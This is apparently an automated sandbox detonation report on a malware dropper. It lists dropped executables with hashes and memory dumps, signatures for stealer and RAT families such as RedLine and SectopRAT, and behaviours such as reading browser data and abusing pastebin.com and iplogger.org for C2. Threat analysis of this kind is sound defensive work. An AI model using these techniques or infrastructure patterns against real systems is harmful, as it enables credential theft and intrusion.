SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

\Users\Admin\AppData\Local\Temp\7zS0BB86396\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

memory/2280-61-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2280-71-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2280-70-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2280-69-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2280-75-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2280-80-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2280-79-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2280-76-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2280-78-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2280-77-0x000000006494A000-0x000000006494F000-memory.dmp

memory/2280-74-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2280-73-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2280-72-0x000000006B440000-0x000000006B4CF000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS0BB86396\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

memory/2280-58-0x000000006B280000-0x000000006B2A6000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS0BB86396\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

\Users\Admin\AppData\Local\Temp\7zS0BB86396\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2060ea1c5d8fae8aa.exe

MD5 ba8541c57dd3aae16584e20effd4c74c
SHA1 5a49e309db2f74485db177fd9b69e901e900c97d
SHA256 dbc19cdcdf66065ddb1a01488dac2961b7aa1cde6143e8912bf74c829eaa2c6c
SHA512 1bdc7461faf32bba7264de0d1f26365ee285de687edef7d957194897fc398145414a63ad5255e6fc5b559e9979d82cf49e8adf4d9d58b86405c921aec027866d

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri209f6924af86d795.exe

MD5 1902e1df4ecf3bf7bcfc0c53b992cd24
SHA1 a0c9cde0b2113466a820fa6ebcccfdcd93b26b97
SHA256 c3bf5a1821e67a8d734ce91cb75b6878457f69ea3211a6c1405bfd30759f2720
SHA512 37dbad160b91e1fc2079a46e77c8d261ad4f4dbbdfcc4d1c5ea70beeb10d271d48a13ef3b3c76a4878b4187d08a66097cb5a8cf77531a4c0df5914d3be2296b6

\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2002ce5f91c761.exe

MD5 39fbed3967544cc6a59e1d1152cdcc35
SHA1 b9e974a506f3be7fc78574ae008e7686093eb82d
SHA256 cb9c63211d26b56dff5651f9fc8a872fd9aab26dfa32df84086aa86ab39810e6
SHA512 cade223df33187f024aaf18794f5890c08cc3387f3e3417908220cc690a55275b558a83e219fb45c98b5c728746fb211d6a68eec0a7e62d08f4b05cc07b8ede3

\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri208f5f140853548.exe

MD5 7c6b2dc2c253c2a6a3708605737aa9ae
SHA1 cf4284f29f740b4925fb2902f7c3f234a5744718
SHA256 b45c9de845522095bbfa55166b519b2be36a08cea688491b9f339e862e79c3ba
SHA512 19579900d07912096641cc7381131ff6fcf60fffc99cdab23f7d8a577aa926bbf0e885a3a7869298bbfc0a05e276c1d5f45712812e4df6980e9554fc48162b07

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20fbc038b0b02ea.exe

MD5 a98672182143436478fdb3806ef6cd5a
SHA1 5d93bb55d9e7915afb11361f42a4c9c6393718b3
SHA256 2010cb8b8069ae8e5527526b36f28b78766473b71b67d601351eb361dbef8528
SHA512 0d2de593d1e194895833396c49efe194fca56afa3396e6aa41f8a51e961ea4f1ca97697ace0625ea97f5dfe7092b75049c58e582dda122cbc7966cb9a5d18892

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20d5530575e8aa3ed.exe

MD5 7c20266d1026a771cc3748fe31262057
SHA1 fc83150d1f81bfb2ff3c3d004ca864d53004fd27
SHA256 4b2fb0f42a923104b69a45aa7a503fbd08739ebf3711599303aa15692136fa46
SHA512 e18c803e38a2111857519639b1ac838edc5b496a79fc579c7329188c66ba791cc499874132e4d616c24447d0cc5ebe7659f69ed1a810bea1a675b94d089b995f

\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20109b9e174d0fc.exe

MD5 37a1c118196892aa451573a142ea05d5
SHA1 4144c1a571a585fef847da516be8d89da4c8771e
SHA256 a3befd523e1e2f4e6f8fce281963f5efb85fe54d85ba67746cc58823d479e92a
SHA512 aac6321582dac5d82cbdb197c20370df3436cf884bea44cbc6d156fd6c4fa99340a3fa866862b83fb0866b31a1e4ebdd73c462972beeb299d4af95592c1d94db

\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20c0c46650eeb2a.exe

MD5 ecc773623762e2e326d7683a9758491b
SHA1 ad186c867976dc5909843418853d54d4065c24ba
SHA256 8f97a40b4d9cf26913ab95eec548d75a8dad5a1a24d992d047e080070282d838
SHA512 40e30981f533b19123ec3d84276a28acd282c01907398ca6d67155901cfaf2c2d6355dc708d0ecfc6c21b5c671b4c3bb87eeb53183b7085474a2acd302f038a4

memory/1444-132-0x0000000000400000-0x0000000000414000-memory.dmp

memory/372-131-0x00000000002A0000-0x00000000002A8000-memory.dmp

\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri200ae385720d3.exe

MD5 8aaec68031b771b85d39f2a00030a906
SHA1 7510acf95f3f5e1115a8a29142e4bdca364f971f
SHA256 dc901eb4d806ebff8b74b16047277b278d8a052e964453f5360397fcb84d306b
SHA512 4d3352fa56f4bac97d5acbab52788cad5794c9d25524ee0a79ef55bfc8e0a275413e34b8d91f4de48aedbe1a30f8f47a0219478c4620222f4677c55cf29162df

memory/1928-143-0x0000000001030000-0x0000000001048000-memory.dmp

memory/1704-142-0x0000000000B40000-0x0000000000BB2000-memory.dmp

memory/1748-156-0x0000000000400000-0x0000000000414000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-P6ABI.tmp\Fri20d5530575e8aa3ed.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

C:\Users\Admin\AppData\Local\Temp\is-5T6MP.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/1444-155-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1928-168-0x0000000000370000-0x0000000000376000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-5T6MP.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

memory/1864-154-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/1916-174-0x00000000003E0000-0x0000000000404000-memory.dmp

memory/1916-177-0x0000000003180000-0x00000000031A2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe

MD5 85ef31a707d583032b8526d16e8883a8
SHA1 16beed53fc46bf75cf4081d73dc843f4d8298569
SHA256 bce2f04e884c2dd6e799861898546be00a745fa1e743ce51044d2232065d2409
SHA512 8e2ca4555b5741400559244bd37e0be09b18e246026e3d0507b02956c27fdc9dabca55672cbd8a52a5832fe66c6da3fe1e649a1cfad101f9c655aa20aa1da31b

memory/2696-198-0x00000000027F0000-0x000000000293C000-memory.dmp

memory/1244-201-0x0000000002750000-0x0000000002979000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20e095683c2b3a0c.exe

MD5 44cfc728f9fbacd834c9b10ce768d41a
SHA1 6589a1435a2ba5ec11a312de5f339597831227d0
SHA256 874c4eab9d0422ee52a1e02e4e95b07805a143dda5a54a19c6a122580aabdb68
SHA512 dd899e05bcbfaec1c3f46011367e000f3edfca1c2f542f9ed55bcbd136142940733f8aa8cd67bd5f647329195ffb843a255713dae362bc44a817734163409113

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri209d5bfbb2.exe

MD5 d08cc10c7c00e13dfb01513f7f817f87
SHA1 f3adddd06b5d5b3f7d61e2b72860de09b410f571
SHA256 0fb8440355ee2a2fe55de0661199620353a01ed4fd1b0d0a2082f4c226e98e0d
SHA512 0b9b8c7da24cdb882bc9b7a37689bc0e81d39f1277017b44512e9a17d9e4e44b314d5b3e06f332d64f3f6953f84d309d4027842ef0000ff012e7af5c9012caa0

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri209c4b463b.exe

MD5 a729d63514511766fcdd2de19cdbd017
SHA1 737827e5c0ab0adc287d3b3bb16d26a9a42f0939
SHA256 6dda16414ec5a7f6908f6088ea5edb7c67b024c3f695fbf7048ab823bcfee728
SHA512 ad6bc65c950a94383f3f1d987508d22167343db632412b74d4734482916a7c18981dc8d84c57109f0882f6c5c6f280db876bafd24837f06996614d1bb9ce6ee2

memory/2280-211-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2280-210-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2280-209-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2280-208-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2280-206-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2280-202-0x0000000000400000-0x000000000051C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri2050293ea5.exe

MD5 7d44a083f0e81baf1ecb264b93bdc9a5
SHA1 4dd23b40065e2ccfbdd4c79386d7e2d37a53efce
SHA256 073b1354e582f8fd758bd128d764fd305d50d76fc45147eb1240e8a402ed1da5
SHA512 245827096522beb8b54a60ad3549cd7509ab35fe650cb2f7d6b48f4cf76430c25c3162ff284d78b19d2351457bbfbd0d2d71751abeb703fef3e2736ab6825c82

memory/1696-222-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1696-224-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1696-221-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1696-220-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1696-218-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1696-216-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1696-214-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1696-212-0x0000000000400000-0x0000000000422000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS0BB86396\Fri20ee0a6fe195bd09.exe

MD5 06ee576f9fdc477c6a91f27e56339792
SHA1 4302b67c8546d128f3e0ab830df53652f36f4bb0
SHA256 035373a454afd283da27ebf569ab355be7db470a1a30c3695e18c984b785e1f8
SHA512 e5b337158905651e2740378615fcd9a8ba2b5e46f02c75be20c22e89b4cb40e8f1dfec1c5c1135f4d59114da9200a772f591622eddb865880b296321d80fb616

memory/2696-225-0x0000000002D80000-0x0000000002E25000-memory.dmp

memory/2696-232-0x0000000002E30000-0x0000000002EC2000-memory.dmp

memory/2696-229-0x0000000002E30000-0x0000000002EC2000-memory.dmp

memory/1916-234-0x0000000000400000-0x00000000016E0000-memory.dmp

memory/1984-233-0x0000000000400000-0x00000000016D5000-memory.dmp

memory/2228-249-0x0000000000400000-0x00000000016BC000-memory.dmp

memory/1560-251-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/1244-252-0x0000000002D60000-0x0000000002E08000-memory.dmp

memory/1748-250-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1244-253-0x0000000002E10000-0x0000000002EA5000-memory.dmp

memory/1244-256-0x0000000002E10000-0x0000000002EA5000-memory.dmp

memory/1244-258-0x0000000002750000-0x0000000002979000-memory.dmp

memory/2696-257-0x00000000027F0000-0x000000000293C000-memory.dmp

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-24 21:35

Reported

2024-11-24 21:37

Platform

win10v2004-20241007-en

Max time kernel

11s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri208f5f140853548.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20ba391d4469.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\09xU.exE N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-J68AC.tmp\Fri20d5530575e8aa3ed.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20e095683c2b3a0c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20109b9e174d0fc.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20ee0a6fe195bd09.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri209f6924af86d795.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20fbc038b0b02ea.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri209d5bfbb2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20d5530575e8aa3ed.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2002ce5f91c761.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20c0c46650eeb2a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20ba391d4469.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri200ae385720d3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2050293ea5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri208f5f140853548.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-J68AC.tmp\Fri20d5530575e8aa3ed.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20d5530575e8aa3ed.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-5867F.tmp\Fri20d5530575e8aa3ed.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\09xU.exE N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20fbc038b0b02ea.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe N/A

Reads user/profile data of web browsers

spyware stealer

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Looks up geolocation information via web service

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3456 set thread context of 4492 N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20fbc038b0b02ea.exe C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20fbc038b0b02ea.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20ee0a6fe195bd09.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2002ce5f91c761.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2050293ea5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri208f5f140853548.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20109b9e174d0fc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\EUUIXyGKjuAj.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81984237\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri209f6924af86d795.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri209d5bfbb2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20ba391d4469.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20d5530575e8aa3ed.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-J68AC.tmp\Fri20d5530575e8aa3ed.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\09xU.exE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20fbc038b0b02ea.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20d5530575e8aa3ed.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20c0c46650eeb2a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20fbc038b0b02ea.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-5867F.tmp\Fri20d5530575e8aa3ed.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2050293ea5.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2050293ea5.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2050293ea5.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri20e095683c2b3a0c.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS81984237\Fri2060ea1c5d8fae8aa.exe N/A
